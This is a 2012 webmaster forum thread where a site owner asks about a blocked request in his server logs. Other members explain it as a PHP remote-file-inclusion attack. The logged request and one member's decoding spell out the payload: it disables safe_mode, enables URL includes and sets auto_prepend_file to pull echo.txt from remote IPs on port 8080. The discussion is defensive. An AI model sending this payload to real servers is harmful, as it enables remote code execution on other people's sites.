homepage Welcome to WebmasterWorld Guest from 54.205.242.179
register, free tools, login, search, subscribe, help, library, announcements, recent posts, open posts,
Subscribe and Support WebmasterWorld
Visit PubCon.com
Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

    
GET Request
Ken_S




msg:4519779
 7:38 pm on Nov 16, 2012 (gmt 0)

The php got it 403'd

However, I do not have the savvy to understand this request.

<> SPRINT-WIRELESS

68.240.0.0/13 = 68.240.0.0 - 68.247.255.255

68.240.116.xxx - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F211.172.112.7%3A8080%2Fecho.txt HTTP/1.1" 403 3251 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

TIA,
Ken

[edited by: incrediBILL at 5:20 am (utc) on Nov 17, 2012]
[edit reason] added line breaks [/edit]

 

keyplyr




msg:4519870
 9:22 am on Nov 17, 2012 (gmt 0)

This is obviously a hack attempt, trying to inject a script. I wonder if you sent a complaint to SPRINT w/ log snippet whether they'd take any action?

iamzippy




msg:4519871
 9:40 am on Nov 17, 2012 (gmt 0)

It's a variant of the Remote File Inclusion exploit, attempting to pull in a bad file named 'echo.txt' from port 8080 on a server in Seoul, Korea (211.172.112.n:8080).
The Korean organization is 'Iosystem' (211.172.112.0/23), who live at the unfortunately-named 'Sukchon-Dong, Songpa-gu'. Go figure.

lucy24




msg:4519875
 10:17 am on Nov 17, 2012 (gmt 0)

It's a little more intelligible if you decode:

-dsafe_mode=Off
+-ddisable_functions=NULL
+-dallow_url_fopen=On
+-dallow_url_include=On
+-dauto_prepend_file=http://{filename as identified by iamzippy, above}

I suppose Dong in Korean means something utterly boring like Smith or Street. (I asked g###, but the translator played dumb because it wasn't in Korean script.)

:: off to see if URL is duly mentioned in htaccess ::

Ken_S




msg:4520067
 12:03 pm on Nov 18, 2012 (gmt 0)

Thanks everyone, I've lurking around for about 3 years now and I have learned a lot from you folks - your expertise has been a great help.

Ken

Ken_S




msg:4522429
 10:03 pm on Nov 25, 2012 (gmt 0)

Different IP - almost same Request & UA

67.181.147.xxx - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About
© Webmaster World 1996-2014 all rights reserved